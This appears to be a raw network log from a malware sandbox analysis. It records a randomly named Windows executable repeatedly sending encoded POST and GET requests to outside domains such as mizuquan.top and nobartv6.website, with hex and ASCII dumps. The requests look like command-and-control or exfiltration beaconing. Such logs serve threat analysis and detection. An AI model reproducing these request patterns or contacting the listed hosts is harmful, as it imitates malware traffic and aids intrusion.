                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.dyme.tech
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:19:51.502353907 CEST410INHTTP/1.1 200 OK
                                                        Server: openresty
                                                        Date: Wed, 18 Sep 2024 14:19:51 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 270
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 78 30 77 48 6f 4a 38 58 3d 52 62 50 48 61 4f 52 75 71 33 56 4c 73 49 76 42 49 65 6c 4a 35 47 4f 35 31 47 47 4d 58 56 69 74 78 55 74 43 6d 73 52 58 47 49 36 6a 79 74 59 64 33 57 56 48 41 79 67 71 73 67 39 6d 34 73 78 37 49 58 67 6c 6f 46 58 2b 38 47 2b 76 79 64 51 5a 4a 4c 50 30 5a 63 77 6d 6b 4a 62 7a 79 66 64 39 73 7a 49 49 72 5a 57 74 30 66 73 50 5a 6f 51 48 2b 46 7a 68 74 37 32 4b 4f 55 30 52 47 42 75 63 74 41 3d 3d 26 32 56 44 6c 4a 3d 5a 32 56 64 68 54 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?x0wHoJ8X=RbPHaORuq3VLsIvBIelJ5GO51GGMXVitxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0ZcwmkJbzyfd9szIIrZWt0fsPZoQH+Fzht72KOU0RGBuctA==&2VDlJ=Z2VdhTx"}</script></head></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        29192.168.2.55364743.242.202.169801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:20:11.031505108 CEST816OUTPOST /e0nr/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.mizuquan.top
                                                        Origin: http://www.mizuquan.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.mizuquan.top/e0nr/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 4b 74 58 63 32 31 38 6b 45 41 59 2f 54 6d 73 33 71 45 49 68 55 77 5a 77 73 7a 6b 77 72 41 6b 7a 54 5a 65 64 7a 64 50 47 56 7a 75 61 4f 37 4b 70 70 53 47 44 63 52 46 38 36 76 48 69 4a 64 42 47 63 42 32 5a 39 46 2b 45 32 38 30 63 34 53 46 34 4c 30 61 33 55 4e 69 51 52 43 47 50 2f 61 50 33 52 48 4c 75 36 6e 73 62 58 51 39 65 65 6c 77 58 61 64 74 30 6f 4d 36 50 53 37 45 4f 4f 76 48 6d 45 50 47 2f 55 57 53 4b 69 2b 6d 45 4e 56 41 79 6f 51 6f 50 75 67 4e 4c 49 47 72 63 47 31 59 67 4d 75 69 72 44 39 4f 5a 34 77 33 46 46 67 47 37 2b 6f 48 61 50 68 48 75 2b 49 3d
                                                        Data Ascii: x0wHoJ8X=H9Rq2Rs7eYeiaKtXc218kEAY/Tms3qEIhUwZwszkwrAkzTZedzdPGVzuaO7KppSGDcRF86vHiJdBGcB2Z9F+E280c4SF4L0a3UNiQRCGP/aP3RHLu6nsbXQ9eelwXadt0oM6PS7EOOvHmEPG/UWSKi+mENVAyoQoPugNLIGrcG1YgMuirD9OZ4w3FFgG7+oHaPhHu+I=
                                                        Sep 18, 2024 16:20:11.912388086 CEST691INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Wed, 18 Sep 2024 14:20:11 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 548
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        30192.168.2.55364843.242.202.169801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:20:13.630875111 CEST836OUTPOST /e0nr/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.mizuquan.top
                                                        Origin: http://www.mizuquan.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.mizuquan.top/e0nr/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 75 70 58 51 78 70 38 6f 30 41 66 7a 7a 6d 73 39 4b 45 32 68 55 4d 5a 77 6f 69 35 77 39 77 6b 39 58 64 65 50 43 64 50 4c 31 7a 75 49 75 37 50 78 4a 53 64 44 63 56 6a 38 34 37 48 69 4a 5a 42 47 59 46 32 5a 4b 70 39 43 6d 38 32 61 34 53 4c 37 37 30 61 33 55 4e 69 51 51 6d 34 50 2f 69 50 33 43 50 4c 76 59 50 76 45 6e 51 2b 5a 65 6c 77 61 36 64 68 30 6f 4d 59 50 58 54 75 4f 4d 48 48 6d 45 66 47 2f 47 75 54 42 69 2b 73 4b 74 55 42 32 6f 68 50 4e 39 4e 41 58 4a 2f 36 64 57 42 51 68 36 44 49 78 68 31 6d 4b 59 63 50 56 57 6f 78 71 4f 4a 75 41 73 78 33 77 70 64 4b 4c 48 33 64 31 4a 71 64 68 71 4b 7a 48 6c 66 4c 34 36 59 4f
                                                        Data Ascii: x0wHoJ8X=H9Rq2Rs7eYeiaupXQxp8o0Afzzms9KE2hUMZwoi5w9wk9XdePCdPL1zuIu7PxJSdDcVj847HiJZBGYF2ZKp9Cm82a4SL770a3UNiQQm4P/iP3CPLvYPvEnQ+Zelwa6dh0oMYPXTuOMHHmEfG/GuTBi+sKtUB2ohPN9NAXJ/6dWBQh6DIxh1mKYcPVWoxqOJuAsx3wpdKLH3d1JqdhqKzHlfL46YO
                                                        Sep 18, 2024 16:20:14.670156956 CEST691INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Wed, 18 Sep 2024 14:20:14 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 548
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        31192.168.2.55364943.242.202.169801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:20:16.333942890 CEST1853OUTPOST /e0nr/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.mizuquan.top
                                                        Origin: http://www.mizuquan.top
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.mizuquan.top/e0nr/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 48 39 52 71 32 52 73 37 65 59 65 69 61 75 70 58 51 78 70 38 6f 30 41 66 7a 7a 6d 73 39 4b 45 32 68 55 4d 5a 77 6f 69 35 77 39 34 6b 39 6b 56 65 65 52 46 50 4b 31 7a 75 54 75 37 4f 78 4a 54 46 44 59 42 2f 38 34 32 38 69 4c 52 42 48 39 52 32 66 34 52 39 4d 6d 38 32 59 34 53 47 34 4c 31 43 33 55 64 75 51 52 57 34 50 2f 69 50 33 45 72 4c 70 4b 6e 76 47 6e 51 39 65 65 6c 4b 58 61 64 4e 30 6f 30 69 50 58 58 55 4f 39 6e 48 6e 6c 76 47 39 7a 43 54 64 79 2b 71 48 4e 56 53 32 6f 74 51 4e 39 51 7a 58 4a 4b 74 64 56 52 51 73 76 71 74 69 79 52 61 54 6f 51 6a 55 33 55 33 36 61 6c 73 4e 2f 4e 2b 7a 62 4a 4d 41 31 72 57 30 4e 48 46 73 65 4c 4d 63 67 65 51 2b 73 31 74 46 6b 30 6c 64 4f 62 34 74 71 70 6e 65 65 74 57 30 51 64 67 52 75 39 6b 49 51 62 38 61 55 56 58 2b 69 41 74 50 45 43 32 65 58 48 73 54 49 2b 44 6d 4e 6c 35 2f 6b 54 35 4b 38 52 54 36 41 62 4c 4a 50 32 72 46 69 38 64 35 46 6e 4d 45 68 72 50 65 76 47 62 69 64 75 41 61 66 6a 74 4c 5a 2b 35 4b 7a 47 34 6b 79 34 71 6c 52 45 30 65 [TRUNCATED]
                                                        Data Ascii: x0wHoJ8X=H9Rq2Rs7eYeiaupXQxp8o0Afzzms9KE2hUMZwoi5w94k9kVeeRFPK1zuTu7OxJTFDYB/8428iLRBH9R2f4R9Mm82Y4SG4L1C3UduQRW4P/iP3ErLpKnvGnQ9eelKXadN0o0iPXXUO9nHnlvG9zCTdy+qHNVS2otQN9QzXJKtdVRQsvqtiyRaToQjU3U36alsN/N+zbJMA1rW0NHFseLMcgeQ+s1tFk0ldOb4tqpneetW0QdgRu9kIQb8aUVX+iAtPEC2eXHsTI+DmNl5/kT5K8RT6AbLJP2rFi8d5FnMEhrPevGbiduAafjtLZ+5KzG4ky4qlRE0enX+0sx2ClC8crqKO8X5RRcsKD0GBAto/oU7FnzLFyAPMzEy6czaVu5jSH6Pl8L64RsUbPM7XvpTnv9FgBbC0M0EFtenUX7xt3k9ZV5HoIlgHHMyhSEaxQDX3l11hkJyQb3o6cLaWwgCSAy1zn36r7oSOW8nLajwlsQrwhswS751V+hZsLsY8AfEbeg1J7TaEjZmStE8rN7C1NYJyZt3brMODGfr0NxLY0NNWRq+jR5VJUFkEZGqy2SEUfpZdtIPkn7jAjtg7+158a8ToaKpxCX58lFsdtFdWZdzRiYUu8PKG915oM7tQSNKtr4EFPJl3a/45YVWnSj9YdjwVVHArSz6pyz1SP1JhqPUnyj5aDXCKhBGROwiiv7t2KUYKkWWrY25pxbbYpayuEHC8+dMu7UGn2Lmsoru6+eEzfYw/5tuZmzxwBqsprnlB4by0VbVTAOP1fGiirJXm/WvAi7EY+SoNeeyALQvkk/4eVI3zzK27AEsYs7J9FMdwPUCBRhuddvCXHMWIA+LgleA1qxgMzeTW0mC0fsdnsB02r+QYu0Ke/ZFK7T8iNRh4aUkG5JSyTeaK0LXh6X8XswjpL1q7iun4bhTiTWURazAN+zjpcOha3KMXCmQEb+yJu3jIRG0ZvTEFdm72xT+OlwiSMPf6EmCscM/+f0tLtB [TRUNCATED]
                                                        Sep 18, 2024 16:20:17.275325060 CEST691INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Wed, 18 Sep 2024 14:20:17 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 548
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        32192.168.2.55365043.242.202.169801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:20:18.911250114 CEST561OUTGET /e0nr/?x0wHoJ8X=K/5K1kUHGJjjXPwyVklTimZmxQWW0oII6mASorW7taRlmnE0Vh93KWWTZt/v3aaqE5pW7Ym6hodTCoZ1X6txGVJXSKSxkKFGk1ZeWgOOIZqPnSDvoqvGMyEebPgjbI83mQ==&2VDlJ=Z2VdhTx HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.mizuquan.top
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:20:19.922276974 CEST691INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Wed, 18 Sep 2024 14:20:19 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 548
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        33192.168.2.553651103.224.182.242801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:20:26.244155884 CEST828OUTPOST /pp43/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.nobartv6.website
                                                        Origin: http://www.nobartv6.website
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.nobartv6.website/pp43/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 79 77 62 69 59 51 2f 71 34 57 31 43 6d 57 79 55 2f 72 32 54 6e 52 34 4f 43 34 6f 44 57 2f 38 6b 68 4b 35 71 71 76 73 35 67 41 52 5a 47 76 47 33 5a 72 2f 38 69 75 52 54 43 69 35 58 4d 33 68 72 50 78 6c 30 72 70 63 57 4e 41 47 6a 49 66 43 74 46 75 33 45 6d 37 65 78 4c 6b 68 70 4b 33 32 51 63 45 43 70 63 44 7a 69 31 6c 2f 6a 68 51 58 6b 38 45 46 6b 5a 51 6c 66 66 46 4c 77 4a 4f 71 4c 49 44 56 2f 56 71 64 77 70 39 53 6f 68 75 65 46 56 7a 42 4f 47 78 6e 79 54 51 7a 30 51 49 52 77 73 7a 43 31 4c 61 5a 48 57 58 54 67 45 44 47 44 71 47 72 49 4d 6f 37 4b 74 4c 6b 7a 78 52 76 73 4e 6c 39 36 57 74 41 3d
                                                        Data Ascii: x0wHoJ8X=ywbiYQ/q4W1CmWyU/r2TnR4OC4oDW/8khK5qqvs5gARZGvG3Zr/8iuRTCi5XM3hrPxl0rpcWNAGjIfCtFu3Em7exLkhpK32QcECpcDzi1l/jhQXk8EFkZQlffFLwJOqLIDV/Vqdwp9SohueFVzBOGxnyTQz0QIRwszC1LaZHWXTgEDGDqGrIMo7KtLkzxRvsNl96WtA=
                                                        Sep 18, 2024 16:20:26.989557028 CEST876INHTTP/1.1 200 OK
                                                        date: Wed, 18 Sep 2024 14:20:26 GMT
                                                        server: Apache
                                                        set-cookie: __tad=1726669226.5409498; expires=Sat, 16-Sep-2034 14:20:26 GMT; Max-Age=315360000
                                                        vary: Accept-Encoding
                                                        content-encoding: gzip
                                                        content-length: 581
                                                        content-type: text/html; charset=UTF-8
                                                        connection: close
                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 [TRUNCATED]
                                                        Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        34192.168.2.553652103.224.182.242801788C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 18, 2024 16:20:28.795279980 CEST848OUTPOST /pp43/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.nobartv6.website
                                                        Origin: http://www.nobartv6.website
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.nobartv6.website/pp43/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 79 77 62 69 59 51 2f 71 34 57 31 43 6e 32 43 55 73 59 75 54 69 78 34 4a 4f 59 6f 44 66 66 38 34 68 4b 6c 71 71 75 59 54 68 79 6c 5a 66 4e 65 33 4c 5a 48 38 6c 75 52 54 4a 43 35 53 43 58 67 47 50 32 74 38 72 6f 77 57 4e 41 36 6a 49 65 79 74 46 64 66 4c 33 37 65 7a 43 45 68 6e 46 58 32 51 63 45 43 70 63 43 58 4d 31 6a 58 6a 67 6c 66 6b 2b 6c 46 72 52 77 6c 59 50 31 4c 77 4e 4f 71 50 49 44 56 4a 56 72 42 65 70 34 65 6f 68 73 47 46 57 69 42 4a 64 68 6e 34 64 77 7a 69 5a 35 34 72 72 7a 4f 45 50 71 4d 50 4b 31 72 4f 42 31 72 70 77 6b 6a 67 66 49 58 79 39 59 73 45 67 68 4f 46 58 47 74 4b 49 36 56 59 63 78 48 6b 33 72 73 4d 66 79 4b 79 69 62 6f 46 53 58 42 39
